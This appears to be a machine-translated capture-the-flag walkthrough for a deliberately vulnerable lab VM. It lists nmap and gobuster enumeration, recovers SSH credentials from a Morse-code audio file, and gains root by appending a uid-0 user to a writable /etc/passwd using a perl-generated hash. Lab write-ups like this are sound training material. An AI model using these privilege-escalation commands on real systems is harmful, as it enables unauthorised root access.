Infiltrate ideas ：

nmap scanning ----gobuster Scan the website directory ---- Decode Morse code online , obtain ssh User name, password ----/etc/passwd Write user authorization

environmental information ：

Drone aircraft ：192.168.101.77

attack ：192.168.101.34

Specific steps ：

1、nmap scanning

sudo nmap -sV -sC -p- 192.168.101.77

2、dirb Scan the website directory （ Rabbit hole ）

​dirb http://192.168.101.77

Find out http://192.168.101.77/robots.txt

（ Below is a rabbit hole ）

Browser access http://192.168.101.77/robots.txt, Find out /find_me

Browser access /find_me, Click on find_me.html, And view the web page source code

view-source:http://192.168.101.77/find_me/find_me.html

Pull to the bottom and find a large comment （ No need to copy and paste ）

base64 After decoding, there is still a pile of meaningless garbled code , That the road is blocked

3、gobuster Scan the website directory

​gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Scan to /bulma

http://192.168.101.77/bulma/ It's a catalog , There's a file in it hahahaha.wav

Download it and listen to it , It feels like Morse code

4、 Decode Morse code online , obtain ssh User name, password

Found an online translator ：Morse Code Audio Decoder | Morse Code World

Press upload Upload hahahaha.wav, Then press play, Automatically convert to text messages

And what you get is

USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

User name trunks, password u$3r Conduct ssh Sign in

ssh [email protected]

5、/etc/passwd Write new user authorization

see /home/trunks/.bash_history, Find a direction /etc/passwd Write to new user

see /etc/passwd File permissions for

ls -al /etc/passwd

Find out trunks The user has write permission

Reference resources /home/trunks/.bash_history The command , First use perl Generate encrypted user passwords

perl -le 'print crypt("123456","addedsalt")'

Among the above orders , The clear text password of the user is 123456

Then the new users test write in /etc/passwd

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd

Finally switch to test user , Input password 123456, get root jurisdiction , And in /root In the directory root.txt

su - test